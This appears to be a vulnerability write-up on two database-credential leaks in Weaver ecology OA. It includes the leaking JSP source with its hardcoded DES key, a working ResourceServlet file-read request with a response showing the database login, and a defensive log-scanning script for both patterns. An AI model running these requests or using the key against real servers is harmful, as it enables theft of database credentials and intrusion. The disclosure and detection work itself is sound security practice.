# Weaver ecology OA interface leaks database configuration information

## /mobile/DBconfigReader.jsp

`http://x.x.x.x:8090/mobile/DBconfigReader.jsp`

![](./dbconfig.png)

![](./fofa.png)

## Fortify code audit flags a weak encryption algorithm

![](./Fortify.jpg)

`SecretKey key = SecretKeyFactory.getInstance("DES").generateSecret(dks1);`

The page DES-encrypts the database URL, user, password and login type with the hardcoded key `1z2x3c4v5b6n` and writes the raw ciphertext to the response, so the output is only as secret as that key, which ships in the JSP source.

```
<%@ page language="java" contentType="text/html; charset=UTF-8"%>
<%@ page import="weaver.file.Prop" %>
<%@ page import="javax.crypto.spec.DESKeySpec" %>
<%@ page import="javax.crypto.*" %>
<%
String conStr=Prop.getPropValue("weaver","ecology.url");
String conUser=Prop.getPropValue("weaver","ecology.user");
String conPsw=Prop.getPropValue("weaver","ecology.password");
String loginType=Prop.getPropValue("weaver","authentic");
// StringBuffer sb = new StringBuffer();
// sb.append("url="+conStr+",");
// sb.append("user="+conUser+",");
// sb.append("password="+conPsw);
String sb="url="+conStr+",user="+conUser+",password="+conPsw+",logintype="+loginType;
byte[] str = sb.getBytes();
String keyString = "1z2x3c4v5b6n";
byte[] keyByte = keyString.getBytes();
// Create a key factory, then use it to convert the DESKeySpec object into a SecretKey object
DESKeySpec dks1 = new DESKeySpec(keyByte);
SecretKey key = SecretKeyFactory.getInstance("DES").generateSecret(dks1);
Cipher cipher = Cipher.getInstance("DES");
cipher.init(Cipher.ENCRYPT_MODE, key);
byte[] cipherText = cipher.doFinal(str);
//System.out.println(cipherText.length);
ServletOutputStream sos = response.getOutputStream();
sos.write(cipherText);
sos.flush();
sos.close();
%>
```

## File read vulnerability: org.springframework.web.servlet.ResourceServlet

![](./fileread.png)

https://docs.spring.io/spring/docs/3.0.x/javadoc-api/org/springframework/web/servlet/ResourceServlet.html

Weaver database configuration file: `/WEB-INF/prop/weaver.properties`

```
GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

```

```
HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
Set-Cookie: ecology_JSessionId=xxxxxx; path=/
Content-Length: 609
Connection: close
Date: Mon, 13 Jul 2020 08:13:13 GMT

ecology.overtime=60
DriverClasses = com.microsoft.jdbc.sqlserver.SQLServerDriver
ecology.url=jdbc\:sqlserver\://127.0.0.1\:1433;DatabaseName\=ecology
ecology.maxconn=300
ecology.user=sa
ecology.password=123456
ecology.charset=ISO
LOG_FORMAT=yyyy.MM.dd'-'hh\:mm\:ss
ecology.isgoveproj=0
DEBUG_MODE=false
```
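A detection pass a defender can run over web-server access logs for the two request patterns described above, added here as an example and not part of the original repository. The log lines are constructed, and the combined/common log format and the `find_leak_requests` / `classify` names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jul/2020:08:13:13 +0000] "GET /mobile/DBconfigReader.jsp HTTP/1.1" 200 64
10.0.0.6 - - [13/Jul/2020:08:13:20 +0000] "GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties HTTP/1.1" 200 609
10.0.0.7 - - [13/Jul/2020:08:14:01 +0000] "GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=%2FWEB-INF%2Fweb.xml HTTP/1.1" 200 1200
10.0.0.8 - - [13/Jul/2020:08:15:00 +0000] "GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/images/logo.png HTTP/1.1" 200 5000
10.0.0.9 - - [13/Jul/2020:08:16:00 +0000] "GET /login/Login.jsp HTTP/1.1" 200 3000
"""

# client ip, method, request target and status code from a common-log-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def classify(request_target):
    """Return a reason string if the request matches one of the two leak patterns, else None."""
    parts = urlsplit(request_target)
    path = unquote(parts.path)
    if path.endswith("/mobile/DBconfigReader.jsp"):
        return "DBconfigReader.jsp: DB credentials DES-encrypted under a hardcoded key"
    if path.endswith("org.springframework.web.servlet.ResourceServlet"):
        for res in parse_qs(parts.query).get("resource", []):
            res = unquote(res)  # parse_qs decoded once; decode again to catch double-encoding
            norm = res.replace("\\", "/").upper()
            if "/WEB-INF" in norm or "/META-INF" in norm or ".." in norm:
                return "ResourceServlet read of protected path: " + res
    return None


def find_leak_requests(log_text):
    """Scan log text and return one dict per request that matches a leak pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, target, status = m.groups()
        reason = classify(target)
        if reason:
            hits.append({"ip": ip, "status": int(status), "target": target, "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in find_leak_requests(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["reason"])
```

A 200 status on either pattern means the endpoint answered, so those hits are the ones to triage first; a 404 on `DBconfigReader.jsp` shows probing but no leak.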